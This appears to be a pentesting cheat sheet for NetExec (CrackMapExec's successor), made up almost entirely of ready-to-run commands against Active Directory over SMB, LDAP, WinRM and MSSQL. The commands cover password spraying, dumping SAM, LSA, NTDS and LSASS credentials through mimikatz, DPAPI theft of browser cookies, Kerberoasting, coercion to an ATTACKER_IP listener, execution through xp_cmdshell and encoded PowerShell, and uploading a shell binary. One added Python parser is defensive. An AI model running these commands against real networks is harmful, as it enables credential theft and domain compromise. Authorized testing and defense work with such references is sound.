NetExec (nxc)
aka nxc, CrackMapExec, cme, netexec
NetExec (nxc) — active successor to CrackMapExec: SMB/LDAP/WinRM/MSSQL multi-protocol Swiss army knife for AD pentesting. Password spraying, credential dumping, Kerberoasting, BloodHound collection, LAPS, coercion checks, and 50+ modules. All payloads verified against netexec.wiki.
Ports
| Port | Proto | Notes |
|---|---|---|
| 445 | tcp | SMB |
| 389 | tcp | LDAP |
| 5985 | tcp | WinRM HTTP |
| 1433 | tcp | MSSQL |
Fingerprint
- nxc smb 192.168.1.0/24 — sweep and fingerprint an entire subnet
- [+] = login success; (Pwn3d!) = local admin / code execution available
Key files
| Path | Holds | Sensitive |
|---|---|---|
| ~/.nxc/ | credential database, session logs, dumped hashes | sensitive |
Exploitation primitives
- Subnet sweep identifies live hosts, OS versions, SMB signing status
- --continue-on-success keeps spraying after first hit; --no-bruteforce pairs user[n]+pass[n]
- SMB --sam/--lsa/--ntds/--dpapi dump credentials from local to domain-wide
- LDAP --kerberoasting / --asreproast pipe directly to hashcat
- --gen-relay-list outputs hosts with SMB signing disabled for ntlmrelayx
Install
pip3 install netexec # or pipx install netexec
nxc --version
# Update
pip3 install --upgrade netexec
Target Formats
nxc smb 192.168.1.10
nxc smb 192.168.1.0/24
nxc smb 192.168.1.0-28 10.0.0.1-67
nxc smb ~/targets.txt
nxc smb 192.168.1.0/24 192.168.2.5
SMB Protocol
Host Discovery & Fingerprint
nxc smb 192.168.1.0/24
Output shows: hostname, IP, domain, OS version, SMB signing (signing:True/False).
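As an added example (not part of the original cheat sheet and not NetExec's own code), a small Python parser that turns a saved sweep into a hardening worklist: hosts with SMB signing disabled and hosts still offering SMBv1. The line layout is assumed from typical nxc fingerprint output, and the sample lines are constructed.

```python
import re

# One nxc SMB fingerprint line (layout assumed from typical nxc output).
# Column spacing varies, so the match keys on the parenthesised tags.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.*?)"
    r"\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)"
    r"\s+\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


def parse_sweep(text):
    """Return one dict per recognised fingerprint line; other lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["signing"] = d["signing"] == "True"
        d["smbv1"] = d["smbv1"] == "True"
        hosts.append(d)
    return hosts


def hardening_report(hosts):
    """Group hosts by the two weak settings a sweep exposes, for remediation tracking."""
    return {
        "signing_disabled": sorted(h["ip"] for h in hosts if not h["signing"]),
        "smbv1_enabled": sorted(h["ip"] for h in hosts if h["smbv1"]),
    }


# Constructed sample sweep output (not captured from a real network).
SAMPLE = """\
SMB         192.168.1.10    445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.21    445    WS01             [*] Windows 10 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.22    445    FS01             [*] Windows Server 2012 R2 Build 9600 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
"""

if __name__ == "__main__":
    for key, ips in hardening_report(parse_sweep(SAMPLE)).items():
        print(f"{key}: {', '.join(ips) or 'none'}")
```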
Authentication Testing
# Domain credentials
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'
nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
# Local credentials
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
nxc smb 192.168.1.0/24 -u localguy -H 'NTHASH' --local-auth
# Kerberos (use -k or --use-kcache)
nxc smb dc.domain.local -u user -p pass -k
export KRB5CCNAME=ticket.ccache && nxc smb dc.domain.local --use-kcache
# NULL / anonymous session
nxc smb 10.10.10.161 -u '' -p ''
# Guest logon (empty password only)
nxc smb 10.10.10.178 -u 'a' -p ''
[+] = login success, (Pwn3d!) = local admin / execution available.
Password Spraying
# One password → all users
nxc smb 192.168.1.101 -u /path/to/users.txt -p 'Summer18'
nxc smb 192.168.1.101 -u /path/to/users.txt -p 'Summer18' --continue-on-success
# Multiple users inline
nxc smb 192.168.1.101 -u user1 user2 user3 -p Summer18
# Multiple passwords → one user
nxc smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
# Pair user[n] with pass[n] (no cross-product brute force)
nxc smb 192.168.1.101 -u user.txt -p pass.txt --no-bruteforce --continue-on-success
Enumeration
# Shares
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --shares
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --shares READ
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --shares WRITE
# Users (domain)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --users
# Local groups
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --local-group
# RID brute-force (enumerate local/domain accounts)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --rid-brute
# Password policy
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --pass-pol
# NULL session password policy
nxc smb DC_IP -u '' -p '' --pass-pol
nxc smb DC_IP -u '' -p '' --users
nxc smb DC_IP -u '' -p '' --shares
# Logged-on users (registry profiles)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --loggedon-users
# Active interactive sessions (needed for schtask_as impersonation)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --qwinsta
# Loaded registry profiles
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --reg-sessions
# Disks
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --disks
# Running processes (tasklist)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --tasklist
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --tasklist keepass.exe
# AV/EDR detection (no admin needed)
nxc smb TARGET -u user -p pass -M enum_av
# NTLMv1 check (requires local admin)
nxc smb TARGET -u user -p pass -M ntlmv1
# BitLocker status
nxc smb TARGET -u user -p pass -M bitlocker
# Generate NTLM relay target list (SMB signing disabled)
nxc smb 192.168.1.0/24 --gen-relay-list relay_list.txt
Spider Shares
# List all files across all readable shares
nxc smb 10.10.10.10 -u user -p pass -M spider_plus
# Download all readable files
nxc smb 10.10.10.10 -u user -p pass -M spider_plus -o DOWNLOAD_FLAG=True
# Spider a specific share with a file pattern
nxc smb TARGET -u user -p pass --spider C\$ --pattern txt
Command Execution
# Auto-selects wmiexec → atexec → smbexec
nxc smb TARGET -u user -p pass -x whoami
# Force execution method
nxc smb TARGET -u user -p pass -x whoami --exec-method wmiexec
nxc smb TARGET -u user -p pass -x whoami --exec-method smbexec
nxc smb TARGET -u user -p pass -x whoami --exec-method atexec
Credential Dumping
# SAM (local account hashes) — requires local admin
nxc smb 192.168.1.0/24 -u user -p pass --sam
# LSA secrets (service creds, cached hashes) — requires local admin
nxc smb 192.168.1.0/24 -u user -p pass --lsa
# NTDS.dit (all domain hashes) — requires DA or local admin on DC
nxc smb DC_IP -u user -p pass --ntds
nxc smb DC_IP -u user -p pass --ntds --enabled # enabled accounts only
nxc smb DC_IP -u user -p pass --ntds vss # via Volume Shadow Copy
nxc smb DC_IP -u user -p pass --ntds --user Administrator # single user
# LSASS — via modules
nxc smb TARGET -u admin -p pass -M lsassy
nxc smb TARGET -u admin -p pass -M nanodump
nxc smb TARGET -u admin -p pass -M mimikatz
nxc smb TARGET -u admin -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"'
# DPAPI (Credential Manager, browsers)
nxc smb TARGET -u user -p pass --dpapi
nxc smb TARGET -u user -p pass --dpapi cookies # browser cookies
nxc smb TARGET -u user -p pass --dpapi nosystem # skip system creds (stealthier)
# SCCM NAA credentials
nxc smb DC_IP -u user -p pass --sccm
nxc smb DC_IP -u user -p pass --sccm disk
nxc smb DC_IP -u user -p pass --sccm wmi
# LAPS — read managed local admin password
nxc smb TARGET -u laps-reader -p pass --laps
nxc smb TARGET -u laps-reader -p pass --laps custom_admin_name # non-default admin
# Third-party app credentials
nxc smb TARGET -u user -p pass -M veeam
nxc smb TARGET -u user -p pass -M winscp
nxc smb TARGET -u user -p pass -M putty
nxc smb TARGET -u user -p pass -M mremoteng
nxc smb TARGET -u user -p pass -M vnc
nxc smb TARGET -u user -p pass -M wifi
# M365 / Azure token broker cache (WAM)
nxc smb TARGET -u user -p pass -M wam
GPP / SYSVOL
nxc smb DC_IP -u user -p pass -M gpp_password
nxc smb DC_IP -u user -p pass -M gpp_autologin
Vulnerability Checks
nxc smb TARGET -u '' -p '' -M zerologon
nxc smb TARGET -u user -p pass -M nopac # requires valid creds
nxc smb TARGET -u '' -p '' -M printnightmare
nxc smb TARGET -u '' -p '' -M smbghost
nxc smb TARGET -u '' -p '' -M ms17-010
nxc smb TARGET -u user -p pass -M ntlm_reflection # requires creds
# Coercion vectors check (PrinterBug, PetitPotam, DFSCoerce, etc.)
nxc smb TARGET -u '' -p '' -M coerce_plus
nxc smb TARGET -u '' -p '' -M coerce_plus -o LISTENER=ATTACKER_IP
nxc smb TARGET -u '' -p '' -M coerce_plus -o LISTENER=ATTACKER_IP ALWAYS=true
nxc smb TARGET -u '' -p '' -M coerce_plus -o METHOD=PetitPotam
LDAP Protocol
Authentication
nxc ldap 192.168.1.0/24 -u user -p password
nxc ldap 192.168.1.0/24 -u user -H NTHASH
nxc ldap dc.domain.local -u user -p pass -k --kdcHost dc.domain.local # Kerberos
nxc ldap 192.168.1.0/24 -u users.txt -p '' -k # AS-REQ enum
Add --no-smb to skip the SMB domain-resolution step (when port 445 is filtered).
User / Group Enumeration
# Domain users (via SMB with LDAP backend)
nxc smb DC_IP -u user -p pass --users
# Domain groups — use LDAP protocol
nxc ldap DC_IP -u user -p pass --groups
# Computers
nxc ldap DC_IP -u user -p pass --computers
# Admin count (accounts that were/are privileged)
nxc ldap DC_IP -u user -p pass --admin-count
# Raw LDAP query
nxc ldap DC_IP -u user -p pass --query "(sAMAccountName=Administrator)" ""
nxc ldap DC_IP -u user -p pass --query "(adminCount=1)" "sAMAccountName"
# Passwords stored in user description field
nxc ldap DC_IP -u user -p pass -M get-desc-users
# Domain SID
nxc ldap DC_IP -u user -p pass -k --get-sid
# Domain controllers list
nxc ldap DC_IP -u user -p pass --dc-list
Kerberos Attacks
# AS-REP Roasting (DONT_REQ_PREAUTH accounts)
nxc ldap DC_IP -u user -p pass --asreproast asrep.txt
nxc ldap DC_IP -u users.txt -p '' --asreproast asrep.txt # with username list, no password
# Crack: hashcat -m 18200 asrep.txt wordlist.txt
# Kerberoasting (accounts with SPNs)
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt --targeted-kerberoast victim1 victim2
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt --targeted-kerberoast users.list
# Crack: hashcat -m 13100 tgs.txt wordlist.txt
# No-preauth Kerberoasting (ASREP + Kerberoast combined)
nxc ldap DC_IP -u user -p '' --no-preauth-targets kerberoastable.list --kerberoasting output.txt
Delegation
# All delegation types
nxc ldap DC_IP -u user -p pass --find-delegation
# Unconstrained delegation only
nxc ldap DC_IP -u user -p pass --trusted-for-delegation
Domain Recon
# Fine-grained password policies (PSOs)
nxc ldap DC_IP -u user -p pass --pso
# Machine Account Quota (for RBCD / computer account creation)
nxc ldap DC_IP -u user -p pass -M maq
# LDAP signing / channel binding check
nxc ldap DC_IP -u user -p pass -M ldap-checker
# Extract subnets
nxc ldap DC_IP -u user -p pass -M get-network
nxc ldap DC_IP -u user -p pass -M get-network -o ONLY_HOSTS=true
# Pre-created computer account abuse
nxc ldap DC_IP -u user -p pass -M pre2k
# gMSA passwords
nxc ldap DC_IP -u user -p pass --gmsa
# ADCS — find certificate services
nxc ldap DC_IP -u user -p pass -M adcs
BloodHound Collection
nxc ldap DC_IP -u user -p pass --bloodhound --collection All
nxc ldap DC_IP -u user -p pass --bloodhound --collection DCOnly
nxc ldap DC_IP -u user -p pass --bloodhound --collection Session,Trusts
WinRM Protocol
# Test authentication
nxc winrm 192.168.1.0/24 -u user -p password
nxc winrm 192.168.1.0/24 -u user -p password -d DOMAIN # when SMB unavailable
# Password spray
nxc winrm 192.168.1.0/24 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Execute PowerShell command (capital -X for WinRM)
nxc winrm TARGET -u user -p pass -X whoami
nxc winrm TARGET -u user -p pass -X 'Get-Process | Select-Object -First 5'
# Credential dumping
nxc winrm TARGET -u user -p pass --sam
nxc winrm TARGET -u user -p pass --lsa
nxc winrm TARGET -u user -p pass --dpapi # dumps Credential Manager (no admin needed)
Note: WinRM uses -X for PowerShell commands. SMB uses -x for cmd.exe commands. Capital matters.
MSSQL Protocol
Authentication & Discovery
# Subnet sweep (shows EncryptionReq flag)
nxc mssql 192.168.1.0/24
# Windows auth (default)
nxc mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
nxc mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB
# SQL local auth
nxc mssql 10.10.10.52 -u sa -p 'password' --local-auth
# Non-default port
nxc mssql 10.10.10.52 -u admin -p pass --port 1434
Query and Execute
# SQL query
nxc mssql TARGET -u sa -p pass --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
# OS command via xp_cmdshell (auto-enables if disabled)
nxc mssql TARGET -u sa -p pass --local-auth -x whoami
nxc mssql TARGET -u sa -p pass --local-auth -x 'powershell -enc BASE64_PAYLOAD'
# File upload / download
nxc mssql TARGET -u admin -p pass --put-file /tmp/shell.exe 'C:\Windows\Temp\shell.exe'
nxc mssql TARGET -u admin -p pass --get-file 'C:\Windows\Temp\output.txt' /tmp/output.txt
Privilege Escalation & Linked Servers
# Check impersonation privileges
nxc mssql TARGET -u user -p pass -M mssql_priv
# Escalate via impersonation
nxc mssql TARGET -u user -p pass -M mssql_priv -o ACTION=privesc
# Rollback privileges after escalation
nxc mssql TARGET -u user -p pass -M mssql_priv -o ACTION=rollback
# Enumerate linked servers
nxc mssql TARGET -u user -p pass -M enum_links
# Execute query on linked server
nxc mssql TARGET -u user -p pass -M exec_on_link -o LINKED_SERVER=SERVER2 COMMAND='select @@servername'
# Enable xp_cmdshell on linked server
nxc mssql TARGET -u user -p pass -M link_enable_cmdshell -o LINKED_SERVER=SERVER2 ACTION=enable
# Run OS command via linked server
nxc mssql TARGET -u user -p pass -M link_xpcmd -o LINKED_SERVER=SERVER2 CMD='whoami'
# Disable after use
nxc mssql TARGET -u user -p pass -M link_enable_cmdshell -o LINKED_SERVER=SERVER2 ACTION=disable
Module Usage Reference
# List all modules for a protocol
nxc smb -L
nxc ldap -L
nxc mssql -L
# Module help / options
nxc smb -M lsassy --options
# Pass options to a module
nxc smb TARGET -u admin -p pass -M mimikatz -o COMMAND='"sekurlsa::logonpasswords"'
# Run multiple modules in one command
nxc smb TARGET -u admin -p pass -M spooler -M lsassy -M winscp
Common Flag Quick-Reference
| Flag | Protocol | Effect |
|---|---|---|
| --local-auth | SMB/MSSQL | Authenticate against local SAM (not domain) |
| --continue-on-success | all | Don’t stop after first valid credential |
| --no-bruteforce | all | Pair user[n]+pass[n], no cross-product |
| -k | all | Use Kerberos auth |
| --use-kcache | all | Use ticket from KRB5CCNAME |
| --exec-method | SMB | wmiexec, smbexec, atexec |
| -x | SMB | Run cmd.exe command |
| -X | WinRM | Run PowerShell command |
| -q | MSSQL | Execute SQL query |
| --ntds vss | SMB | Dump NTDS via Volume Shadow Copy |
| --dpapi nosystem | SMB | Skip SYSTEM credentials |
| --laps [name] | SMB | Read LAPS-managed password |
| --gmsa | LDAP | Read gMSA password |
| --bloodhound --collection All | LDAP | Full BloodHound ingest |
| --gen-relay-list | SMB | Output hosts without SMB signing |
| --find-delegation | LDAP | All delegation types |
| --asreproast | LDAP | AS-REP roast to file |
| --kerberoasting | LDAP | Kerberoast to file |
| --pso | LDAP | Fine-grained password policies |